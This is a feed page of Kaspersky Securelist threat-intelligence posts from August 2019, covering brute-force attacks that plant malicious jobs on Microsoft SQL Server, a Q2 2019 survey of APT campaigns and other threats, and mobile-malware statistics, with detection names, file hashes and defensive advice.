Kaspersky Securelist

Syndikovat obsah Securelist
Aktualizace: 23 min 12 sek zpět

Agent 1433: remote attack on Microsoft SQL Server

22 Srpen, 2019 - 12:00

All over the world companies large and small use Microsoft SQL Server for database management. Highly popular yet insufficiently protected, this DBMS is a target of choice for hacking. One of the most common attack on Microsoft SQL Server — the remote attack based on malicious jobs — has been around for a long time, but it is still used to get access to workstations through less-than-strong administrator password.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Attempted attacks geography from January through July 2019 (download)

According to our statistics, the majority of such attacks fall on Vietnam (>16%), Russia (~12%), India (~7%), China (~6%), Turkey and Brazil (5% each).

Attack description

Microsoft SQL Server attacks are normally massive in nature and have no particular target: the attackers scan sub-networks in search of a server with a weak password. The attack begins with a remote check of whether the system has MS SQL Server installed; next the intruders proceed to brute-force the account password to access the system. In addition to password brute-forcing, they may also resort to authorization via a user account token, authorized on a previously infected machine.

SQL Server authorization

As soon as penetration is accomplished, the attackers modify server configuration in order to access the command line. That done, they can covertly make the malware secure in the target system using jobs they had created for the SQL Server.

Examples of jobs

Job is a sequence of commands executed by SQL Server agent. It may comprise a broad range of actions, including launching SQL transactions, command line applications, Microsoft ActiveX scripts, Integration Services packages, Analysis Services commands and queries, as well as PowerShell scripts.

A job consists of steps, the code featured in each one being executed at certain intervals, allowing intruders to deliver malicious files to the target computer again and again, should they be deleted.

Below are a few examples of malicious queries:

  • Installing a malware download job using the standard ftp.exe utility:
  • Downloading malware from a remote resource using JavaScript:
  • Writing a malware file into the system followed by its execution:

We have analyzed the payloads delivered to the compromised machines via malicious jobs to learn that most of them were cryptocurrency miners and remote access backdoors. The less common ones included passwords capture and privilege escalation utilities. It should be mentioned, however, that the choice of payload depends on the attackers’ goals and capabilities and is by no means limited to the mentioned options.

To protect your machines from malicious job attacks, we recommend using robust, brute-force-proof passwords for your SQL Server accounts. It will also pay to check Agent SQL Server for third-party jobs.

Kaspersky Lab products return the following verdicts when detecting malware that installs malicious SQL Server jobs:

  • Trojan.Multi.GenAutorunSQL.a
  • HEUR:Backdoor.Win32.RedDust.gen
  • HEUR:Backdoor.MSIL.RedDust.gen

And use proactive detection using the System Watcher component:

  • PDM:Trojan.Win32.GenAutorunSqlAgentJobRun.*
  • PDM:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic
MD5
  • 6754FA8C783A947414CE6591D6FA8540
  • 91A12A4CF437589BA70B1687F5ACAD19
  • 98DFA71C361283C4A1509C42F212FB0D
  • A3F0B689C7CCFDFAEADD7CBBF1CD92B6
  • E2A34F1D48CE4BE330F194E8AEFE9A55

IT threat evolution Q2 2019

19 Srpen, 2019 - 12:00

Targeted attacks and malware campaigns More about ShadowHammer

In March, we published the results of our investigation into a sophisticated supply-chain attack involving the ASUS Live Update Utility, used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers added a backdoor to the utility and then distributed it to users through official channels.

ASUS was not the only company used by the attackers. Other targets included several gaming companies, a conglomerate holding company and a pharmaceutical company – all located in South Korea. Either the attackers had access to the source code of the victims’ projects or they injected malware at the time of project compilation – indicating that they had already compromised the networks of those companies.

Our analysis of the sophisticated backdoor deployed by the attackers revealed that it was an updated version of the ShadowPad backdoor used in supply-chain attacks that we reported in 2017. The newly updated version used by ShadowHammer follows the same principle as before. The backdoor unwraps multiple stages of code before activating a system of plugins responsible for bootstrapping the main malicious functionality. The attackers used at least two stages of C2 servers, where the first stage would provide the backdoor with an encrypted next-stage C2 domain. We also found that ShadowHammer reused algorithms used in multiple malware samples, including PlugX – a backdoor that is quite popular among Chinese-speaking hacker groups.

This supply-chain attack is a landmark in the cyberattack landscape, indicating that even reputable vendors may suffer from the compromise of digital certificates and raising concerns about the software development infrastructure of all other software companies. The attackers behind ShadowHammer were able to add a backdoor to developer tools and inject malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism. It’s important that software vendors add another line to their software build conveyor to check software for potential malware injection – even after the code has been digitally signed.

You can read more in our report.

The ongoing activities of Roaming Mantis

In February, we detected new activity of the Roaming Mantis threat actor. This group has evolved significantly in a short space of time. The activities of Roaming Mantis were first reported in 2017, when it targeted Android. Its distribution method was SMS and it concentrated on just one country – South Korea. Since then, the scope of the group’s activities have widened considerably. Roaming Mantis now supports 27 languages, targets iOS as well as Android and includes crypto-mining for PCs in its arsenal.

The key finding of our latest research is that Roaming Mantis continues to seek ways to compromise iOS devices. The group has even built a landing page for iOS users. When the victim visits this page, they see a pop-up message guiding them to the malicious iOS mobile config installation. Following installation of this mobile configuration, the phishing site automatically opens in a web browser and sends collected information from the device to the attackers’ server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI and MEID.

Our telemetry also uncovered a new wave of malicious APK files targeting Android devices. Our analysis has confirmed that this is a variant of the sagawa.apk Type A malware that was previously distributed via SMS in Japan. Roaming Mantis also continues the DNS manipulation it has used in earlier campaigns.

The countries most affected by this campaign are Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran and Vietnam. We have detected this malware over 6,800 times for over 950 unique users during this period. However, we believe the scale of this attack wave is much bigger and that these numbers reflect only a small part of the campaign.

The muddy waters of Middle East APTs

In April, we provided an analysis of the tools used by the MuddyWater threat actor following initial infection of its targets. MuddyWater, which first surfaced in 2017, is an APT group that focuses on government bodies and telecommunications companies in the Middle East – Iraq, Saudi Arabia, Bahrain, Jordan, Turkey and Lebanon, and also a few other nearby countries – Azerbaijan, Pakistan and Afghanistan. The group uses an array of customized attack tools, mostly developed by the group itself using Python, C# and PowerShell, to compromise their victims and exfiltrate data.

MuddyWater also employs deceptive techniques to divert investigations once they have deployed attack tools inside a victim’s system, such as Chinese strings, Russian strings and impersonation of the ‘RXR Saudi Arabia’ hacking group.

This threat actor has expanded its targets and malware arsenal in recent years; and we expect the group to continue developing. However, while moderately sophisticated in terms of its tools, the group’s current OPSEC is poor, leaving details that could reveal different types of information about the attackers.

ScarCruft continues to evolve

We continue to track the activities of ScarCruft, a Korean-speaking and alleged state-sponsored threat actor that typically targets organizations with links to the Korean peninsula. This group, which has shown itself to be highly skilled and resourceful, continues to develop.

Our most recent investigation shows that throughout 2018 the group used a multi-stage process to update each of its malware modules effectively while also evading detection. The group continues to use spear-phishing and known exploits as initial attack vectors. Once they have compromised a target, the attackers install an initial dropper, which uses a known exploit for CVE-2018-8120 to bypass Windows UAC, and execute the next payload, a downloader, with higher privileges. This connects to the C2 server to download the next payload, which they hide in an image using steganography. This is a full-featured backdoor and information exfiltration RAT (Remote Access Trojan) known as ROKRAT. This malware can download additional payloads, execute Windows commands, save screenshots and audio recordings, and exfiltrate files.

We also discovered an interesting piece of rare malware created by ScarCruft – a Bluetooth device harvester. They use this to collect information directly from infected devices, including device name, class, whether it’s connected to anything else, address, authentication state and whether it’s trusted or remembered.

We believe that ScarCruft is primarily targeting intelligence for political and diplomatic purposes. Our telemetry revealed several victims of this campaign – investment and trading companies in Vietnam and Russia that we believe may have links to North Korea. ScarCruft also attacked a diplomatic agency in Hong Kong and another diplomatic agency in North Korea.

We discovered that one victim from Russia had also triggered a malware detection while staying in North Korea in the past. This target had been infected with GreezeBackdoor, a tool of the DarkHotel APT group. The victim had also been attacked using the Konni malware – malware disguised as a North Korean news item in a weaponized document called ‘Why North Korea slams South Korea’s recent defense talks with U.S-Japan.zip’. This is not the first time that we have seen an overlap of ScarCruft and DarkHotel threat actors: it is something that members of our team have discussed at security conferences and we have shared details on the overlap with our threat intelligence customers in the past. Both threat actors are Korean speaking, although they seem to have different TTPs (Tactics, Techniques and Procedures).

To learn more about our intelligence reports, or to request more information on a specific report, please contact intelreports@kaspersky.com.

The Zebrocy multi-language malware salad

We recently reported on activity by the APT threat actor Zebrocy. This is a Russian-speaking group, with roots going back to 2013, which specializes in victim profiling and access. Zebrocy shares malware artefacts and more with both the Sofacy and BlackEnergy threat actors, suggesting that the group has a supportive role as a sub-group. Sofacy is believed by many to have targeted the 2016 US elections. BlackEnergy is the group behind the 2015 attacks on the Ukrainian power grid. In addition, another threat actor, Turla, deployed spear-phishing macros that were almost identical to previous, non-public Zebrocy code in 2018. It seems that Zebrocy is used to gain an initial foothold in target systems before the other groups deploy their destructive and espionage tools.

In its most recent campaign, Zebrocy used spear-phishing to deliver a new Nim downloader to targets across the globe – including targets in Germany, the UK, Afghanistan, Kazakhstan, Kyrgyzstan, Tajikistan, Turkmenistan, Syria, Iran, Myanmar and Tanzania.

Platinum returns

In June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and South East Asia. This campaign, which could date back to 2012, features a multi-stage approach. We dubbed it ‘EasternRoppels‘. The threat actor behind the campaign, which we believe to be the PLATINUM APT group, uses an elaborate, previously unseen, steganographic technique to conceal communication.

For this campaign, the operators used WMI (Windows Management Instrumentation) subscriptions to run an initial PowerShell downloader that drops a small PowerShell backdoor. We noticed that many of the initial WMI PowerShell scripts had different hardcoded C2 IP addresses, different encryption keys, salt for encryption (also different for each initial loader) and different active hours (meaning that the malware only worked during a certain period every day). The C2 addresses were located on free hosting services, and the attackers made heavy use of a large number of Dropbox accounts (for storing the payload and exfiltrated data). The purpose of the PowerShell backdoor was to perform initial fingerprinting of a system, since it supported a very limited set of commands: download or upload a file and run a PowerShell script.

We were investigating another threat at the same time, which we believe to be the second stage of the same campaign. After deeper analysis, we realized that the two threats were related: among other things, both attacks used the same domain to store exfiltrated data, and both types of malware infected some of the victims at the same time. In the second stage, all executable files were protected with a runtime cryptor and after unpacking them we found another, previously undiscovered, backdoor that is related to PLATINUM.

A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof: the actors used two interesting steganography techniques in this APT. It’s also interesting that the attackers decided to implement the utilities they need as one huge set – an example of the framework-based architecture that is becoming more and more popular.

The Gaza Cybergang SneakyPastes campaign

Gaza Cybergang is a politically motivated Arabic-language threat actor that is actively targeting the Middle East and North Africa, with particular focus on the Palestinian Territories. There has been confusion surrounding the group’s activities: notwithstanding the alignment of goals, the group’s activities seemed scattered and involved different tools and malware.

Our monitoring of the group’s activities in 2018 has led us to distinguish between three attack groups that operate under the umbrella of this threat actor – they are Gaza Cybergang Group1 (aka ‘MoleRATs’), Gaza Cybergang Group2 (aka ‘Desert Falcons‘) and Gaza Cybergang Group3 (aka ‘Operation Parliament‘). We have reported the activities of the last two in previous reports. Our latest report focuses on the first, Gaza Cybergang Group1 or MoleRATs.

This is the least sophisticated of the three attack groups and relies heavily on the use of paste sites, in an operation name ‘SneakyPastes’, to gradually sneak one or more remote access Trojans (RAT) onto victims’ systems. The group has been recorded employing phishing and several chained stages to try to evade detection and extend the life of their C2 servers. The most popular targets of SneakyPastes are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking. Our telemetry shows there were victims in 39 countries, with most of the 240 unique victims located in the Palestinian Territories, followed by Jordan, Israel and Lebanon.

TajMahal: a sophisticated new APT framework

In autumn 2018, we discovered a previously unknown APT framework, which we named ‘TajMahal’, that had been active for the previous five years. It is a sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers; and even its own file indexer for the victim’s computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System – one of the highest numbers of plugins we have ever seen in an APT toolset.

There are two different packages, self-named ‘Tokyo’ and ‘Yokohama’ and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes.

The malware includes extensive functions for stealing data. This includes stealing cookies, intercepting documents in the printer queue, gathering data from backup copies of iOS devices, recording and taking screenshots of VoIP calls, stealing CD images made by the victim, indexing files, including those on external drives, and stealing data when the drive is subsequently detected again.

So far, our telemetry has revealed just a single victim, a diplomatic body from a country in Central Asia.

FIN7 cybercrime operations continue

During 2018, Europol and the US Department of Justice announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. Some people believed that the arrest would have an impact on the group’s operations. This doesn’t seem to have been the case. In fact, CobaltGoblin and FIN7 have extended the number of groups operating under their umbrella: there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

The first is the now-notorious FIN7 that specializes in attacking various companies to get access to financial data or PoS infrastructure. It relies on a Griffon JScript backdoor and Cobalt/Meterpreter and, in recent attacks, PowerShell Empire. The second is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and a similar infrastructure, but targets only financial institutions and associated software and service providers.

We believe with a reasonable level of confidence that the AveMaria botnet is linked to these two groups: AveMaria targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7. The final group is the newly discovered CopyPaste group, which has targeted financial entities and companies in one African country – leading us to believe that this group is associated with cyber-mercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It’s possible that the operators of this cluster of activity were influenced by open-source publications and don’t actually have any ties with FIN7.

All of these groups benefit greatly from unpatched systems in corporate environments and continue to use effective spear-phishing campaigns in conjunction with well-known Microsoft Office exploits generated by the framework. So far, the groups have not used any zero-day exploits. FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they have proved to be quite successful.

You can read more in our FIN7 report.

Zero-day vulnerability in win32k.sys

In March, our AEP (Automatic Exploit Prevention) technology detected an attempt to exploit a vulnerability in Windows. Further analysis led to us discovering a zero-day vulnerability in ‘win32k.sys’ – the fifth consecutive exploited Local Privilege Escalation vulnerability that we had discovered in recent months. We reported the vulnerability to Microsoft on March 17, who assigned it CVE-2019-0859 and released a patch on April 9.

This is a Use-After-Free vulnerability presented in the ‘CreateWindowEx’ function. The exploit we found in the wild was used to target 64-bit versions, from Windows 7 to the latest builds of Windows 10. Exploitation of the vulnerability allows the malware to download and execute a script written by the attackers, which in the worst-case scenario could provide an attacker with full control over the infected PC. The attackers were able to gain sufficient privileges to install a PowerShell backdoor and use this to obtain full access to the compromised computer.

Plurox: a modular backdoor

Earlier this year, we came across a curious backdoor that we named Plurox. Our analysis revealed that the malware has some quite unpleasant features. It can spread over a local network using an exploit, provide access to the attacked network and install miners and other malicious software on victims’ computers. The backdoor is also modular, so the attackers can expand its functionality using plugins, as required.

The malware can install one of several crypto-currency miners, depending on the system configuration. The bot sends a package with the system configuration to the C2 server and in response it receives information about which plugin to download. In all, we counted eight mining modules.

We also found a UPnP plugin. This module receives a subnet with mask /24 from the C2 server, retrieves all IP addresses from it, and attempts to forward ports 135 (MS-RPC) and 445 (SMB) for the currently selected IP addresses on the router using the UPnP protocol. If this is successful, it reports the result to the C2 server, waits for 300 seconds (five minutes) and then deletes the forwarded ports. We assume the attackers use this plugin to attack a local network. It would take an attacker just five minutes to sort through all the existing exploits for services running on these ports. If the administrators notice the attack on the host, they will see the attack coming directly from the router, not from a local machine. This attack, if successful, will help the cybercriminals gain a foothold in the network.

There is also an SMB module that’s responsible for spreading malware over the network using the EternalBlue exploit.

Other security news Digital doppelgangers

In April, we published the results of our investigation into Genesis, an e-shop that is trading over 60,000 stolen and legitimate digital identities. This marketplace, along with other malicious tools used by cybercriminals, is designed to abuse the machine learning-based anti-fraud approach of ‘digital masks’.

Every time we enter our financial, payment and personal information during an online transaction, anti-fraud solutions match us against a digital mask, a unique, trusted customer profile based on known device and behavior characteristics that allows the financial organization’s anti-fraud teams to determine if the transaction is legitimate.

However, a digital mask can be copied. Our investigation found that cybercriminals are actively using such ‘digital doppelgangers’ to bypass advanced anti-fraud measures. The Genesis dark net marketplace is an online shop selling stolen digital masks and user accounts at prices ranging from $5 to $200 each. Its customers simply buy previously stolen digital masks together with stolen logins and passwords to online shops and payment services, and then launch them through a browser and proxy connection to mimic real user activity. If they have the legitimate user’s account credentials, the attacker can then access their online accounts or make new, trusted transactions in their name.

Other tools enable attackers to create from scratch their own unique digital masks that will not trigger anti-fraud solutions. We investigated one such tool, a special Tenebris browser with an embedded configuration generator to develop unique fingerprints. Once created, a carder can simply launch the mask through a browser and proxy connection and conduct any operations online.

To enhance security, we recommend that businesses enable multi-factor authentication at every stage of the user validation processes, consider introducing additional methods of verification, such as biometrics, harness the most advanced analytics for user behavior and integrate threat intelligence feeds into SIEM and other security controls in order to get access to the most relevant and up-to-date threat data.

Potential problems with third-party plugins

We recently looked at plugins and some of the potential problems with plugins.

Online stores, information portals and other resources are often based on platforms that provide developers with a set of ready-made tools. Features they need are usually available as plugins, allowing them to cherry-pick the functionality they need. Plugins are small software modules that either add to, or improve, the functionality of a website, for example, to display social network widgets, harvest statistics or to create surveys and other types of content. Plugins save developers from having to reinvent the wheel every time they need a particular feature.

However, things can go wrong. Plugins run automatically and don’t make their presence known unless something goes wrong. If the creator of the plugin abandons it, or sells it to another developer, it will not necessarily be apparent. If a plugin isn’t updated for a long time, it’s likely to contain unpatched vulnerabilities that could be exploited to take control of a web site or download malware. Even when updates are available, website owners often overlook them; and vulnerable modules can remain active years after the developer has withdrawn support for them.

Some content management platforms block the download of unsupported modules. However, it is not possible for a developer to delete vulnerable plugins from users’ websites, since this could cause disruption. Moreover, abandoned plugins might be stored, not on the platform itself, but on publicly available services. When the creator discontinues support or deletes a module, a website will continue to access the container in which it was located. Cybercriminals can easily capture or clone this abandoned container, forcing the resource to download malware instead of the plugin.

This is what happened with the New Share Counts tweet counter, hosted on Amazon S3 cloud storage. The developer posted a message on their website saying that they had withdrawn support for the plugin, but more than 800 clients did not read it. When the plugin writer later closed the container on Amazon S3, the cybercriminals created their own storage with the exact same name and put a malicious script inside it. Websites still using the plugin began to load the new code, which redirected users to a phishing resource promising a prize for taking part in a survey, rather than the tweet counter. Something similar can happen if a developer decides to sell their plugin and isn’t choosy about who they sell it to.

We recommend that companies independently monitor the security of plugins on their website and take appropriate action to ensure that they are safe.

Game of threats

Torrent sites have always been the go-to places for those seeking pirated versions of games and other software, as well as Hollywood blockbusters. However, in recent years, popular TV shows have joined the list of content on such sites. This provides opportunities for cybercriminals to spread malware. One study, conducted in 2015, reported that bootlegged content accounts for 35% of files shared via BitTorrent; and more than 99% of the counterfeit files analyzed linked to either malware or scam websites.

We recently looked at threats disguised as new episodes of popular TV shows distributed through torrent sites, to see which ones were the most popular and what kinds of threats cybercriminals are distributing in this way. The total number of people who encountered malware related to a TV show in 2018 was 126,340: this is around a third less than in 2017, but still a significant number. The top three TV shows most often used as bait are Game of Thrones, The Walking Dead and Arrow. Game of Thrones accounted for 17% of pirated content, even though this was the only TV show in our list that did not screen any new episodes in 2018. The top three most popular threat categories were Trojan, Downloader and AdWare. The full details are included in our report, including our tips on how to avoid threats coming from content distributing platforms.

Many people choose to stream TV content these days. This also provides opportunities for cybercriminals who claim to provide free downloads in return for the personal data of anyone who wants to view content without paying for it, or to those who live in a region where the content is not available. This year’s Game of Thrones premiere broke records; and we saw a spike in cybercriminal activity related to the show: the number of attacks almost quadrupled following the premiere.

Large-scale SIM-swap fraud

SIM-swap fraud occurs when a criminal masquerades as a customer of a mobile phone operator and persuades the company to give them a replacement SIM. They use stolen personal details to impersonate the victim. The new SIM gives the criminal control of the victim’s mobile phone number, allowing them to assume the victim’s identity. If the victim has opted to receive one-time passcodes via SMS, the criminal can use these, with other stolen credentials, to obtain access to their online accounts, including their bank account.

We recently investigated SIM-swap fraud in Brazil and Mozambique. Mobile payments are now huge in developing countries, especially in Africa and Latin America. Mobile phone-based money transfers allow people to access financing and micro-financing services, and to easily deposit, withdraw and pay for goods and services with a mobile device. In some cases, almost half the value of some African countries’ GDP goes through mobile phones. However, criminals are using SIM-swap fraud to target mobile payments; and people are losing money on a major scale.

Fraudsters use social engineering, bribery, or even a simple phishing attack to take control of customers’ phone numbers and intercept mobile money transactions or one-time passcodes to complete a transfer of funds or steal people’s money.

In Mozambique, this sort of crime has been widely reported in the national news, with the media questioning the integrity of the banks and mobile operators, suggesting that they may be colluding in the scams. Since the reputation of the banks and operators was at stake, they had to take urgent action to protect their customers. At Mozambique’s largest bank, they had a monthly average of 17.2 cases of SIM-swap fraud, but the true impact nationwide is difficult to estimate, as most banks don’t publicly share statistics. Some of the victims were high-profile business people, who had up to US$50,000 stolen from their accounts.

In Brazil, the problem also affected politicians, ministers, governors and high-profile business people, as well as ordinary citizens. One organized gang alone in Brazil was able to SIM-swap 5,000 victims.

Our report outlines the problem faced in both countries and a local solution developed in Mozambique that drastically reduced the level of fraud.

The problems with legal spyware

Spyware might sound like something from a Hollywood movie, but you can buy commercial versions of such programs – known as ‘stalkerware’ – for just a few dollars. They let you spy on someone simply by installing an app on their smartphone or tablet. Once installed, such apps remain hidden and provide access to a range of personal data, including device location, browsing history, SMS messages, social media chats and more. Some even make video and voice recordings.

Such apps are usually legal, which is why we identify them formally as ‘not-a-virus: Monitor’ when alerting someone to their presence. Their developers often market them as parental control software; and significant numbers of people download and use them – in 2018, we detected stalkerware on the devices of more than 58,000 people.

Leaving aside the moral aspects of installing such apps on someone else’s device, there are several things that make them a bad idea.

Most of these apps fail to comply with the policies of official stores such as Google Play. So they tend to be found on dedicated sites that are ‘off the beaten track’; and by requiring the user to enable the installation of apps outside the official store, make the device vulnerable to attack.

Stalkerware apps often request system rights, sometimes including root access, giving the app full control of the device, including the right to install other apps. Some also insist that the person using the device allow them to deactivate or remove protection solutions.

These apps upload personal data from the device to the vendor’s server, where the person who installed the app can review it. However, the lack of security could expose that data to hackers.

Legitimate apps, unlike stalkerware, do not hide themselves on the device, deactivate security solutions or pose a threat to the privacy of their customers. They are also available in official marketplaces.

To protect yourself from stalkerware, secure your devices with a strong password and don’t disclose it to anyone, block installation of third-party apps, check installed apps regularly, delete any that you don’t need and protect your devices with a reputable security product.

The WhatsApp call that opens up a device to surveillance

A zero-day vulnerability in WhatsApp, reported in May, allowed an attacker to eavesdrop on devices running the app. The attacker could read encrypted chats, turn on the microphone and camera and install spyware to allow further surveillance, such as browsing through the victim’s photos and videos, accessing their contact list and more.

To exploit the vulnerability, the attacker simply needed to call the victim via WhatsApp. This specially crafted call triggered a buffer overflow in WhatsApp, allowing the attacker to take control of the application and execute arbitrary code in it. The attackers used this method, not only to snoop on people’s chats and calls, but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device.

The vulnerability affects WhatsApp for Android prior to 2.19.134, WhatsApp Business for Android prior to 2.19.44, WhatsApp for iOS prior to 2.19.51, WhatsApp Business for iOS prior to 2.19.51, WhatsApp for Windows Phone prior to 2.18.348 and WhatsApp for Tizen prior to 2.18.15. WhatsApp released patches for the vulnerability on May 13. Some have suggested that the spyware may be Pegasus, developed by Israeli company NSO.

High severity bugs in VLC media player

In June, VideoLAN, the developers of the open source VLC media player, issued patches for two high-severity bugs – an out-of-bound write vulnerability and a stack-buffer-overflow bug. These were two of 33 fixes issued in the wake of a new bug bounty program funded by the European Commission as part of the Free and Open Source Software Audit (FOSSA) project. You can read more here.

Smart speakers listeners

Amazon has come under fire for its privacy policies following a report by Bloomberg that the company hires auditors to listen to Amazon Echo recordings, in an effort to improve the ability of its digital assistant to understand human speech. The team of auditors listens to voice recordings after the word ‘Alexa’ is used to wake up the device and picks a small number of interactions from a random set of users to annotate. One especially alarming aspect of the report is the suggestion that, although Amazon provides customers with an opt-out, recordings sometimes start without the device ‘hearing’ the wake-word.

Amazon recently filed a patent based on the idea of ‘voice-sniffing’ that would allow its smart speaker to eavesdrop on all conversations and analyze them. If implemented, such technology would allow the company to listen-in to unguarded conversations, undermining people’s privacy. It would also provide Amazon with a wealth of data that it could use for targeted advertising.

Growing numbers of people are taking advantage of the convenience that smart speakers offer. However, remember that they are also smart listeners. You should review the privacy settings of any smart device that you buy and disable any functionality that you’re not comfortable with.

Privacy matters

Personal information is a valuable commodity. The value of personal data is evident from the steady stream of data breaches reported in the news. Sometimes, we are tricked into exposing confidential data – maybe because we’re too eager to click on attachments or links in email messages, or because we’re not careful enough when looking for a good deal online. However, sometimes our personal information is exposed when an online provider fails to secure it properly.

There’s not much we can do to prevent the loss or theft of data from an online company. However, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, by using two-factor authentication and by restricting the amount of data that we choose to share online.

Information is valuable not just to cybercriminals, but to legitimate companies. Often, it is the ‘price’ we pay for ‘free’ products and services, including browsers, email accounts and social network accounts. It’s not always clear how our data will be used by online providers, so it’s essential to check the privacy settings carefully and opt out of anything you’re not comfortable with. Of course, where it’s not possible to opt out, you may need to think again about signing up for the service, or deleting your account if you have already done so.

In May, we illustrated some of these issues by looking back at some of the scandals surrounding Facebook’s handling of personal data over the last two years.

IT threat evolution Q2 2019. Statistics

19 Srpen, 2019 - 12:00

These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network,

  • Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.
  • 217,843,293 unique URLs triggered Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 228,206 users.
  • Ransomware attacks were defeated on the computers of 232,292 unique users.
  • Our File Anti-Virus detected 240,754,063 unique malicious and potentially unwanted objects.
  • Kaspersky products for mobile devices detected:
    • 753,550 malicious installation packages
    • 13,899 installation packages for mobile banking Trojans
    • 23,294 installation packages for mobile ransomware Trojans
Mobile threats Quarterly highlights

Q2 2019 will be remembered for several events.

First, we uncovered a large-scale financial threat by the name of Riltok, which targeted clients of not only major Russian banks, but some foreign ones too.

Second, we detected the new Trojan.AndroidOS.MobOk malware, tasked with stealing money from mobile accounts through exploiting WAP-Click subscriptions. After infection, web activity on the victim device went into overdrive. In particular, the Trojan opened specially created pages, bypassed their CAPTCHA system using a third-party service, and then clicked on the necessary buttons to complete the subscription.

Third, we repeated our study of commercial spyware, a.k.a. stalkerware. And although such software is not malicious in the common sense of the word, it does entail certain risks for victims. So as of April 3, 2019, Kaspersky mobile products for Android notify users of all known commercial spyware.

Fourth, we managed to discover a new type of adware app (AdWare.AndroidOS.KeepMusic.a and AdWare.AndroidOS.KeepMusic.b verdicts) that bypasses operating system restrictions on apps running in the background. To stop its thread being terminated, one such adware app launches a music player and plays a silent file. The operating system thinks that the user is listening to music, and does not end the process, which is not displayed on the main screen of the device. At this moment, the device is operating as part of a botnet, supposedly showing ads to the victim. “Supposedly” because ads are also shown in background mode, when the victim might not be using the device.

Fifth, our attention was caught by the Hideapp family of Trojans. These Trojans spread very actively in Q2, including by means of a time-tested distribution mechanism: antivirus solution logos and porn apps.

Finally, in some versions, the Trojan creators revealed a less-than-positive attitude to managers of one of Russia’s largest IT companies:

Mobile threat statistics

In Q2 2019, Kaspersky detected 753,550 malicious installation packages, which is 151,624 fewer than in the previous quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of detected malicious installation packages, Q3 2018 – Q2 2019 (download)

What’s more, this is almost 1 million fewer than the number of malicious installation packages detected in Q2 2018. Over the course of this year, we have seen a steady decline in the amount of new mobile malware. The drop is the result of less cybercriminal activity in adding members to the most common families.

Distribution of detected mobile apps by type

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of newly detected mobile apps by type, Q1 and Q2 2019 (download)

Among all the threats detected in Q2 2019, the lion’s share went to potentially unsolicited RiskTool apps with 41.24%, which is 11 p.p. more than in the previous quarter. The malicious objects most frequently encountered came from the RiskTool.AndroidOS.Agent family (33.07% of all detected threats in this class), RiskTool.AndroidOS.Smssend (15.68%), and RiskTool.AndroidOS.Wapron (14.41%).

In second place are adware apps, their share having increased by 2.16 p.p. to 18.71% of all detected threats. Most often, adware belonged to the AdWare.AndroidOS.Ewind family (26.46% of all threats in this class), AdWare.AndroidOS.Agent (23.60%), and AdWare.AndroidOS.MobiDash (17.39%).

Trojan-class malware (11.83%) took third place, with its share for the quarter climbing by 2.31 p.p. The majority of detected files belonged to the Trojan.AndroidOS.Boogr family (32.42%) – this verdict was given to Trojans detected with machine-learning tools. Next come the Trojan.AndroidOS.Hiddapp (24.18%), Trojan.AndroidOS.Agent (14.58%), and Trojan.AndroidOS.Piom (9.73%) families. Note that Agent and Piom are aggregating verdicts that cover a range of Trojan specimens from various developers.

Threats in the Trojan-Dropper class (10.04%) declined noticeably, shedding 15 p.p. Most of the files we detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (71% of all detected threats in this class), while no other family claimed more than 3%. A typical member of the Wapnor family consists of a random pornographic image, a polymorphic dropper, and a unique executable file. The task of the malware is to sign the victim up to a WAP subscription.

In Q2 2019, the share of detected mobile bankers slightly decreased: 1.84% versus 3.21% in Q1. The drop is largely due to a decrease in the generation of Trojans in the Asacub family. The most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (30.79% of all detected mobile bankers), Trojan-Banker.AndroidOS.Wroba (17.16%), and Trojan-Banker.AndroidOS.Agent (15.70%) families.

